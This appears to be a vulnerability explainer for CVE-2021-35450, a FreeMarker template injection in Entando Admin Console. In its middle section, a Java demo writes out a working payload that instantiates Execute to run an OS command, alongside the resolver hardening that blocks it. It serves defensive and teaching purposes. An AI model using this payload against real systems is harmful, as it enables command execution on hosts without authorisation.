
CVE-2021-35450 : What You Need to Know

Discover the impact of CVE-2021-35450, a Server Side Template Injection vulnerability in Entando Admin Console 6.3.9 and earlier that lets a privileged user execute operating system commands through FreeMarker. Learn the technical details and mitigation steps.

A Server Side Template Injection vulnerability in the Entando Admin Console, version 6.3.9 and earlier, allows a privileged user to supply FreeMarker templates that are rendered by the server, leading to command execution via freemarker.template.utility.Execute.

Understanding CVE-2021-35450

This vulnerability allows a privileged Admin Console user to abuse the FreeMarker template engine embedded in the Entando Admin Console to run arbitrary operating system commands on the server hosting the console.

What is CVE-2021-35450?

CVE-2021-35450 is a Server Side Template Injection vulnerability in the Entando Admin Console. Template content submitted by a user who holds template-editing privileges is passed to FreeMarker unrestricted, so that user can write a template which instantiates freemarker.template.utility.Execute and runs commands of their choosing.

The Impact of CVE-2021-35450

Commands injected this way run with the privileges of the Java process that hosts the Admin Console. An attacker who already holds a privileged console account, or who has stolen one, can therefore step out of the application and onto the underlying host: reading configuration and secrets, manipulating data, and executing arbitrary commands on the affected system. This is a significant security risk even though the entry point requires an authenticated, privileged user.

Technical Details of CVE-2021-35450

The following technical details outline the vulnerability, affected systems, and exploitation mechanism:

Vulnerability Description

The vulnerability allows an attacker with template-editing privileges to have FreeMarker templates of their own rendered by the server, resulting in the execution of arbitrary commands via freemarker.template.utility.Execute.

Affected Systems and Versions

Entando Admin Console versions 6.3.9 and earlier are impacted by this vulnerability.

Exploitation Mechanism

By leveraging the Server Side Template Injection flaw, an attacker crafts a FreeMarker template that uses the engine's ?new built-in to instantiate freemarker.template.utility.Execute by class name. Execute is a template method model whose only purpose is to run its string argument as an operating system command, so invoking the instance with a command string executes that command on the target system. The ?new built-in is governed by the Configuration's "new builtin class resolver"; with FreeMarker's default resolver any class on the classpath can be instantiated, which is what makes this primitive available to template authors.
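The following is an added example, not code from the page or from the Entando project, that reproduces the primitive described above in a stand-alone FreeMarker program and shows the engine-level hardening that blocks it. The template text, class and method names other than the FreeMarker API (FreeMarkerSstiDemo, render, vulnerableConfig, hardenedConfig, PAYLOAD) are assumptions made for the example; how Entando itself wires templates into FreeMarker is not shown on the page.

```java
import freemarker.core.TemplateClassResolver;
import freemarker.template.Configuration;
import freemarker.template.Template;
import freemarker.template.TemplateException;

import java.io.IOException;
import java.io.StringReader;
import java.io.StringWriter;
import java.util.Collections;

public class FreeMarkerSstiDemo {

    // Constructed attacker payload (assumption, for illustration). The ?new built-in
    // instantiates the named class; Execute runs the string it is called with as an
    // OS command and returns the command's output into the rendered page.
    static final String PAYLOAD =
            "${\"freemarker.template.utility.Execute\"?new()(\"id\")}";

    // Render untrusted template text under a given Configuration and return the output.
    static String render(Configuration cfg, String templateText)
            throws IOException, TemplateException {
        Template t = new Template("untrusted", new StringReader(templateText), cfg);
        StringWriter out = new StringWriter();
        t.process(Collections.emptyMap(), out);
        return out.toString();
    }

    // Default FreeMarker settings: the new-builtin class resolver is UNSAFE_RESOLVER,
    // so ?new may instantiate any class on the classpath, Execute included.
    static Configuration vulnerableConfig() {
        return new Configuration(Configuration.VERSION_2_3_31);
    }

    // Hardened: ?new cannot instantiate anything. The same payload now fails with a
    // TemplateException instead of spawning a process. SAFER_RESOLVER is a weaker
    // alternative that only blocks Execute, ObjectConstructor and JythonRuntime.
    static Configuration hardenedConfig() {
        Configuration cfg = new Configuration(Configuration.VERSION_2_3_31);
        cfg.setNewBuiltinClassResolver(TemplateClassResolver.ALLOWS_NOTHING_RESOLVER);
        return cfg;
    }

    public static void main(String[] args) throws IOException {
        // Only run the vulnerable branch on a disposable lab host: it really executes "id".
        try {
            System.out.println("default config output: " + render(vulnerableConfig(), PAYLOAD));
        } catch (TemplateException e) {
            System.out.println("default config: unexpected failure: " + e.getMessage());
        }

        try {
            render(hardenedConfig(), PAYLOAD);
            System.out.println("hardened config: payload rendered (hardening NOT effective)");
        } catch (TemplateException e) {
            // Expected: instantiating Execute is refused before any command runs.
            System.out.println("hardened config blocked the payload: " + e.getMessage());
        }
    }
}
```

The resolver setting is defense in depth for any application that renders templates authored by a privileged but not fully trusted user; it does not replace the vendor fix. Note also that ?new is only one route: an application that exposes its own Java objects in the data model can hand template authors other dangerous methods, so review the data model as well as the resolver when auditing a FreeMarker integration.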

Mitigation and Prevention

To address CVE-2021-35450, follow these mitigation strategies:

Immediate Steps to Take

        Update the Entando Admin Console to a release newer than 6.3.9 that addresses this vulnerability. Until the upgrade is in place, restrict template-editing privileges to the smallest possible set of accounts and review existing templates for use of the ?new built-in, in particular any reference to freemarker.template.utility.Execute.

Long-Term Security Practices

        Regularly monitor security advisories and update systems promptly to prevent exploitation of known vulnerabilities. Treat template-editing rights in any content management console as an administrative privilege equivalent to code execution, and protect those accounts accordingly (strong authentication, audit logging of template changes).

Patching and Updates

        Apply security patches and updates from the official Entando sources to protect systems against potential threats, and verify after patching that the deployed Admin Console version is newer than 6.3.9.
